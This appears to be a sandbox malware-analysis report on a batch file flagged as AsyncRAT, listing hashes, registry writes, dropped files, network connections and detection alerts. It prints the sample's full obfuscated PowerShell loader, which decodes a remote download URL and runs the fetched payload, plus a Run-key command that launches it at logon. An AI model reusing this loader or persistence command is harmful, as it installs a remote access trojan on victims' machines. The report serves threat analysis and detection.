File name:	Fishtailing.bat
Full analysis:	https://app.any.run/tasks/b5501490-f30d-4037-a238-36ab50ad3cab
Verdict:	Malicious activity
Threats:	AsyncRAT is a RAT that can monitor and remotely control infected systems. This malware was introduced on Github as a legitimate open-source remote administration software, but hackers use it for its many powerful malicious functions. Remote access trojans (RATs) are a type of malware that enables attackers to establish complete to partial control over infected computers. Such malicious programs often have a modular design, offering a wide range of functionalities for conducting illicit activities on compromised systems. Some of the most common features of RATs include access to the users’ data, webcam, and keystrokes. This malware is often distributed through phishing emails and links. Malware Trends Tracker >>>
Analysis date:	November 10, 2024, 15:50:27
OS:	Windows 10 Professional (build: 19045, 64 bit)
Tags:	gumen rat asyncrat remote
Indicators:
MIME:	text/plain
File info:	ASCII text, with very long lines (6185), with no line terminators
MD5:	DD027E0A14187172BD3B0FAEDA4F9714
SHA1:	846B621BBB2A50ECEBD914F904CDA724A3E250E1
SHA256:	C4BF9B32500E3AFDD168C84B86E5E0CDFA5A524789A2AFA16161C8335E35EAA7
SSDEEP:	96:kDJh2DBrlTQycG56ZV0B8auo5mt1KVAzIAmSjs8+ijQH1OQWpk+jfj0:kDJh4lTaGP8LnK24SA8jy1OF1jfA


(PID) Process:	(6872) msiexec.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Skiveskydningernes196
Operation:	write	Name:	Separatfred
Value: <#Trachelopexia Overskygges Dopamelanin Konsorternes #>;$Crescentlike='Resundsbroer';<#Bistroernes Unforeknowable Underhammer Frosts Melenes Nydelsesmidlets Chitties #>; function Ranglerne($mercuriality){If ($host.DebuggerEnabled) {$Personal++;}$centralists=$Ploughable+$mercuriality.'Length' - $Personal; for ( $Subligation=4;$Subligation -lt $centralists;$Subligation+=5){$Unplausibleness=$Subligation;$Klientellet+=$mercuriality[$Subligation];}$Klientellet;}function Dissimilere($Sregne234){ . ($Flatterende) ($Sregne234);}$Skraelling=Ranglerne 'For MPhe oSta z SmoiFlablSekul ManaUnin/Sakr ';$Naturaliseres65=Ranglerne ' Fl THav lDerisTo a1Bill2blyi ';$Hemimetamorphous='P.yt[Tropn InseUigetTveb.DryaSLeateSektrPottVBiltISklmcM coeVa epTraloOnciIReplns udTSnarMDeprACistnInteaCh.eGoverECod rA yg]Spro: B,a:marrsRhizeBo,uC,usbuFezeRcol IQua t MarYAnsaPTredrDra,O flat SkaOAchlcT,iaO L,aLteak= Cha$ PreNincoAAk,uT CoruFrstRtromamavelDeltiMaksSSemiEEvenr SulEImposconc6P,ot5Colu ';$Skraelling+=Ranglerne 'Fuld5Spor.Sca 0A,rh Drej(HypoWCo ciHusvnFarmd plaoP,raw CrusTids StabN ljnT op Oxon1Reme0Mes .Weat0Du k;U hy KlarW VgmiRi,bnReti6R tt4Sp,n;Stro StexLimb6Tryk4Bila;o yn KonsrParovindf: Und1Brin3 Red1 Una. Unc0 eks)Arre SygeGSubce Pe cRuptkAraroIdea/ En 2Mill0Hype1Cu i0 Kom0Gras1Inva0 Ces1Xeno CognF kseiUdskr CubenazifHaveo olix,ver/L nd1Jule3gera1 har.Ddpu0F rh ';$subsidizing=Ranglerne ' aksUSkamSUnlee DumrAf.d-StatATmmeg Kone WurNBr.ktmyri ';$Menialism=Ranglerne 'A.rohHypot Tert.arepClocsS,rr: Co,/Bf,e/C.thfslidiS,uglPisheAfskdGrannb aj. elveCounupoly/GraplFer 9BesetProkE raw LokbSuda9T ivsdiva6Win aBog aUrolRU opw Skr5Aksef FimyNetvUEmitibodia AthCPave0 ElvlMin.f Mor/BetrFGhb lSlikgZieteudbesTekskUd lr Spri ParvCoageForelPsyksjyd.e.itrrPurpnBraneForh.wassmVrani K rx Int ';$Uneulogised=Ranglerne 'Anti>Bill ';$Flatterende=Ranglerne 'SkadI KloEfounX fll ';$Svovlblommen='Formidlingen';$prdikatet='\Dendrokronologiens.Den';Dissimilere (Ranglerne 's tu$,prigNittLVoryo AfmbFusiAfondLOuts:SupekQ adNGoiaAHydrLFremDCounHA stYPrepTI,veT DiceRegunAfko9Unli3Skru=Fors$AnreELov,N.hosV Far: .quA Ligp AmpP edndGaataHizztChemaRing+L ce$Ne rpH,ner konDPegbIHre,kFa rAProtTUnnieNonptNone ');Dissimilere (Ranglerne 'Ox,d$ElevG ncaLLando veBGishaImbrLM.xb: AnpAO ernTranomediISig.NF rtT Diae SporNed,=Bayi$Hy eMSk ueVelsnThioIenspA D rlFiskiB,acslempmGiol.TitasAmorpRe.iL,dygI Fo t Oms(Uafv$a bruB benOutpEPor uBleplJonno rtsGTilkIHandsUsleeFrordPol )Trop ');Dissimilere (Ranglerne $Hemimetamorphous);$Menialism=$anointer[0];$Nordfoto=(Ranglerne 'Skru$ tyrGMangl M,coDi.bBFlamaOmnilkera: Toro Rapp TalECarpr InhaAfgiT genIKompO .agnKemiSS.impNonllOrd.AHvi,N Gra=UnraN eteE ,naWtynd-UndeO.emob araJ D seKy tCUnriT Bab DilaSV skyForbsF.rsTFajiE esvmHets..macnSte ESy kTSkie. HipWForme ,osB AllcBes,l Br IRejse MisNBuddtFlge ');Dissimilere ($Nordfoto);Dissimilere (Ranglerne 'Lacr$Ar gOmarspH maeDe,arConcaSpegtLbeni appo Dian Ln sQuispG lelStoraOvernU tr.sophHBasieSeptaDepadWasieSnudrAtavsFort[Und $ Cr sDe eu.andbSpersVapoiMeddd KaliMestz Heki larnRadigProl]Ster=Viol$ FanSKar kPushrEmenaG.dbeHaanlFil l GuniPlannM gagGan. ');$Kejser=Ranglerne ' rec$VedgOFetipVandeBed rFluna,enntTrani uldoNonon DicsUd.pp HyplBanjaNo.dnAdsk.BorrDDigao Busw Plon Mool,ighoMus aSmind H lFBlliiPreml Mise Oms(Pseu$SowbM ceaegrunnTaktiSu,paMonolArvei,lads Skim nsp,Nonm$GesjNSubdoLoftn TopmtussoVestnPseua OmbrOve.cUndehCrimi M.ncShafaSkatl Fil) P e ';$Nonmonarchical=$Knaldhytten93;Dissimilere (Ranglerne '.ran$TypoGI neL ArmOHullB voga PubLMind:FrimC esoUStataS herCha.tDiabACin = Ind(,otetmiddE nhasort.tfied-UmaapAto AAftet Om hStil Mel$Ra inun.eomo snS,ibMAphrO JeaNDisoABeneRbirdcDeprH.eplILyrecBo,gAFr,dlSamo)Wee. ');while (!$Cuarta) {Dissimilere (Ranglerne 'E,un$ ChagUndelsanjoE.tab p.oaHe.elRust:Sur ASkrosArbagAc.ue V nrUndedLenn= U a$HyldtLs lrribsuPille Tet ') ;Dissimilere $Kejser;Dissimilere (Ranglerne 'Ud tSTabuTLoada llurPrenTTrac-ImmaS JacLKulbe PhieVan P kil Tric4D sp ');Dissimilere (Ranglerne 'G.dd$OrigGsk.llCo cOK mbBBiblaP,oclc ma:UntocT,nduRingAIndsRDitttFamia Bos=Cafe(DepltGreeee.itSFormtFo.s-ForrPNoniaUre.tTudsh ra Frt.$ProdnLitoO umncultmFdseoUn an ouA Ba.RUntaC ,oaHBryniC ypC SstaA islTeod)Genn ') ;Dissimilere (Ranglerne 'Rets$ KodgUntel F.sO An BTrkiaAvliLNors:HjkoHSulpECu.crHeroOUtjedDoveIB rkAPh lNThi 1Wean6 ona7Tink= G o$Bloog UnflVenioU.eubB stA FimLP,tr:DissPNontrSupeoBilaVFyldiFlorNNippcDeclI Un AFrinl llIBem,sGadeMOsci+ lan+ Tre%Spoi$MicrAFor NDia oMitoI NeknCircTGennePrinRUnge.Delec ,oio RoouApotnWhigtsco ') ;$Menialism=$anointer[$Herodian167];}$Postprophesy=345278;$Marinestationers=30427;Dissimilere (Ranglerne 'Lion$Id lgDec.L ,anoT rrbReseAMicel Dis:desthTu eY AdalSmerOProtp AfsAsvintP.owhPakkI stnSBulgt Tin Ph e=Prog Landg ReveT xatudtr-Utilcle docorfNFo stBo peMarcn ostFr s Cong$ EksNReriO T eNBradmGarbOartenpassaEnherAkedcTranHSi uiPolicOp yaEpipl.alg ');Dissimilere (Ranglerne ' orp$Ku tgNikalSt,ro BogbSor.aAfdal Fea:Sac,TUnadiK,ghlSeled U,ekJa.on Av.iSfornS mmgBifa Argu=Dist Outt[PatiSCuityAntis JoctnettetwinmRea .NyvuCPanhoUps nGenbvBifaeRestrZorrtProg]Eksa: Af.:Ble FFo dr dowo i.pmG maBStolaM.kvsannae at6 F.l4V ngSResitCiter QuiiAuton modgrhab(,ylo$DecrHBys y AnilinfroelekpUdgiaCan tGooshHushi T isMulttDepe)Sfyr ');Dissimilere (Ranglerne 'Ther$ FongMelll Sl o.ushbNonea M,rLacti:RoseUU suN truGGec,aFuldrPicubLepte EftJStngdAeole KnorTavpe,inonApob Lrel=Edsf Ort[SkrasFiskYMit S FuntB paEVrismVund.,utot SygeAfviXBal,t,tam.VildEBakiN GascSimsoHomodSu fi SlaNReclgBrs,]Dans: ray:PreeaCy isNilscSporiTrstI.ick. vrgArt ETo sTSchaSC.mmTProgrSubtIAfroNgarng kor(pre $M ontHelmiWillLMultDAf.vkIntenCr.ti .reNSnatG sop)Brag ');Dissimilere (Ranglerne 'opif$LejegB.col ,anOFedtbCurvABrazL Sup: oshLsnogAUdgaCVandhKa vRConvyStafmPrimaArgotAdm,OCompr Sne=A ra$UdspuTricnReligTubeAWanyrRajabWrakeSupejMa kDI,eleMa dRPosteHillnSup .AutoSdo rUPerobsettSAltatTrylRVldeiSubsnRecoGLodg( ris$ PrePDim oSv,jsEtuitBurbP BogrA spo Fr PSeneHTeste Gres peYInit,Ko m$Hop M StaaQuinrDis IVarmnSsonEKul,SunfuT ndha,fulT Trei BefoYag nVandEUd,rrBeansSyn ) Ma ');Dissimilere $Lachrymator;
(PID) Process:	(6872) msiexec.exe	Key:	HKEY_CURRENT_USER\Environment
Operation:	write	Name:	Bolette
Value: c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
(PID) Process:	(7104) reg.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Operation:	write	Name:	Cerebropedal180
Value: %Bolette% -windowstyle 1 $Bnkhagen=(gp -Path 'HKCU:\Software\Skiveskydningernes196\').Separatfred;%Bolette% ($Bnkhagen)

PID	Process	Filename		Type
712	powershell.exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IUGFQ1RVF0AR3WWI293T.temp		binary
		MD5:242521A86A6CC0C622818EBF28C60FE2	SHA256:131881EE973C8EC1DF94B5F67892546B021E8F927C5728FB9F0B08E4F282B209
712	powershell.exe	C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_sjpbg5eo.l4x.ps1		text
		MD5:D17FE0A3F47BE24A6453E9EF58C94641	SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
712	powershell.exe	C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive		binary
		MD5:BF901A3F42124161C88F5D8A68969EDA	SHA256:B188CCFE4177495949A46DC61D10614DF122BD4AC740172E73E864351D21891B
6872	msiexec.exe	C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E		binary
		MD5:A7FF594824F71DEE340B8FD03EFC744C	SHA256:AAC63256B4F66B3E4CD0D0B566764DA9FC916B175502D651005FE1DA5195A53E
3108	powershell.exe	C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_hoesaoxi.p4l.ps1		text
		MD5:D17FE0A3F47BE24A6453E9EF58C94641	SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
712	powershell.exe	C:\Users\admin\AppData\Roaming\Dendrokronologiens.Den		text
		MD5:B8475896E38A3F638DB059DA52FBE568	SHA256:AFF0C0928378909AACF3EE3AA365DD8D8308D4FCC3AAB6E1EF8545A3C22E0A22
6872	msiexec.exe	C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E		der
		MD5:7194820CC46C7516FB0C7B7C4FB99060	SHA256:C7498628B06E8B53DAAC1F2FCFF44B618E596A8803318DDB8FD14EA7CB5BEFDB
6872	msiexec.exe	C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\204C1AA6F6114E6A513754A2AB5760FA_90B17EDAFA78E1CF65547D865DF1EA1B		binary
		MD5:F3AD8FBC399204C2B6D04AF0BA1E7E4D	SHA256:BDF3E630B6725CDB68F2F7C9ECB9D8CC8E5A2C605DCD3BE675FA15255D739E19
6872	msiexec.exe	C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3F26ED5DE6B4E859CCCA6035ECB8D9CB		binary
		MD5:F98CAF69D157EDE80AB94BFEE5DCB4C0	SHA256:B48FAC959FC207D16154473FDDD6B03A92FC9CB34A16128979EE951201CF8C7C
6872	msiexec.exe	C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3F26ED5DE6B4E859CCCA6035ECB8D9CB		binary
		MD5:04D4B15976CD33F87C34DC15929EACC0	SHA256:BD5351AA27B154E1EE306EAD468B8321C1264FA404498C6F58239B888F20AE5B

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
—	—	GET	200	192.229.221.95:80	http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D	unknown	—	—	whitelisted
5488	MoUsoCoreWorker.exe	GET	200	23.48.23.150:80	http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl	unknown	—	—	whitelisted
624	svchost.exe	GET	200	192.229.221.95:80	http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D	unknown	—	—	whitelisted
5488	MoUsoCoreWorker.exe	GET	200	184.30.21.171:80	http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl	unknown	—	—	whitelisted
6136	SIHClient.exe	GET	200	184.30.21.171:80	http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl	unknown	—	—	whitelisted
6872	msiexec.exe	GET	200	104.18.38.233:80	http://ocsp.comodoca.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTtU9uFqgVGHhJwXZyWCNXmVR5ngQUoBEKIz6W8Qfs4q8p74Klf9AwpLQCEDlyRDr5IrdR19NsEN0xNZU%3D	unknown	—	—	whitelisted
6872	msiexec.exe	GET	200	172.64.149.23:80	http://ocsp.usertrust.com/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBTNMNJMNDqCqx8FcBWK16EHdimS6QQUU3m%2FWqorSs9UgOHYm8Cd8rIDZssCEQCTi7COYph7T3X5jLalBFyW	unknown	—	—	whitelisted
6136	SIHClient.exe	GET	200	184.30.21.171:80	http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl	unknown	—	—	whitelisted
6872	msiexec.exe	GET	200	172.64.149.23:80	http://ocsp.usertrust.com/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRyyuDOSqb8BtprWZSAvBT9kFoYdwQU%2BftQxItnu2dk%2FoMhpqnOP1WEk5kCEQDW5AVPRSjeFM0jjZDI5oYe	unknown	—	—	whitelisted

PID	Process	IP	Domain	ASN	CN	Reputation
6944	svchost.exe	20.73.194.208:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	NL	whitelisted
4	System	192.168.100.255:137	—	—	—	whitelisted
4292	RUXIMICS.exe	20.73.194.208:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	NL	whitelisted
5488	MoUsoCoreWorker.exe	20.73.194.208:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	NL	whitelisted
4360	SearchApp.exe	104.126.37.153:443	www.bing.com	Akamai International B.V.	DE	whitelisted
—	—	192.229.221.95:80	ocsp.digicert.com	EDGECAST	US	whitelisted
4	System	192.168.100.255:138	—	—	—	whitelisted
712	powershell.exe	45.131.244.47:443	filedn.eu	pCloud AG	CH	malicious
624	svchost.exe	20.190.159.75:443	login.live.com	MICROSOFT-CORP-MSN-AS-BLOCK	IE	whitelisted
624	svchost.exe	192.229.221.95:80	ocsp.digicert.com	EDGECAST	US	whitelisted

Domain	IP	Reputation
settings-win.data.microsoft.com	20.73.194.208 40.127.240.158	whitelisted
www.bing.com	104.126.37.153 104.126.37.136 104.126.37.162 104.126.37.139 104.126.37.155 104.126.37.160 104.126.37.186 104.126.37.170 104.126.37.137 104.126.37.128 104.126.37.130	whitelisted
ocsp.digicert.com	192.229.221.95	whitelisted
google.com	142.250.186.142	whitelisted
filedn.eu	45.131.244.47	malicious
login.live.com	20.190.159.75 20.190.159.23 20.190.159.4 20.190.159.71 40.126.31.69 20.190.159.73 40.126.31.67 20.190.159.0	whitelisted
th.bing.com	104.126.37.130 104.126.37.153 104.126.37.162 104.126.37.170 104.126.37.128 104.126.37.137 104.126.37.136 104.126.37.139 104.126.37.186	whitelisted
go.microsoft.com	23.218.210.69	whitelisted
crl.microsoft.com	23.48.23.150 23.48.23.169 23.48.23.159 23.48.23.158 23.48.23.162 23.48.23.167 23.48.23.166 23.48.23.156 23.48.23.177	whitelisted
www.microsoft.com	184.30.21.171	whitelisted

PID	Process	Class	Message
2172	svchost.exe	Potentially Bad Traffic	ET INFO DYNAMIC_DNS Query to a *.bumbleshrimp .com Domain
6872	msiexec.exe	Domain Observed Used for C2 Detected	REMOTE [ANY.RUN] AsyncRAT SSL certificate
6872	msiexec.exe	Domain Observed Used for C2 Detected	ET MALWARE Generic AsyncRAT Style SSL Cert
6872	msiexec.exe	Domain Observed Used for C2 Detected	ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server)

General Info

Fishtailing.bat

DD027E0A14187172BD3B0FAEDA4F9714

846B621BBB2A50ECEBD914F904CDA724A3E250E1

C4BF9B32500E3AFDD168C84B86E5E0CDFA5A524789A2AFA16161C8335E35EAA7

96:kDJh2DBrlTQycG56ZV0B8auo5mt1KVAzIAmSjs8+ijQH1OQWpk+jfj0:kDJh4lTaGP8LnK24SA8jy1OF1jfA

Software environment set and analysis options

Launch configuration

Software preset

Hotfixes

Behavior activities

MALICIOUS

GUMEN has been detected

Run PowerShell with an invisible window

ASYNCRAT has been detected (SURICATA)

SUSPICIOUS

Starts POWERSHELL.EXE for commands execution

Uses REG/REGEDIT.EXE to modify registry

Starts CMD.EXE for commands execution

Connects to unusual port

Contacting a server suspected of hosting an CnC

INFO

Creates or changes the value of an item property via Powershell

Manual execution by a user

Malware configuration

Static information

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Registry activity

Modification events

Files activity

Dropped files

Network activity

HTTP requests

Connections

DNS requests

Threats

Debug output strings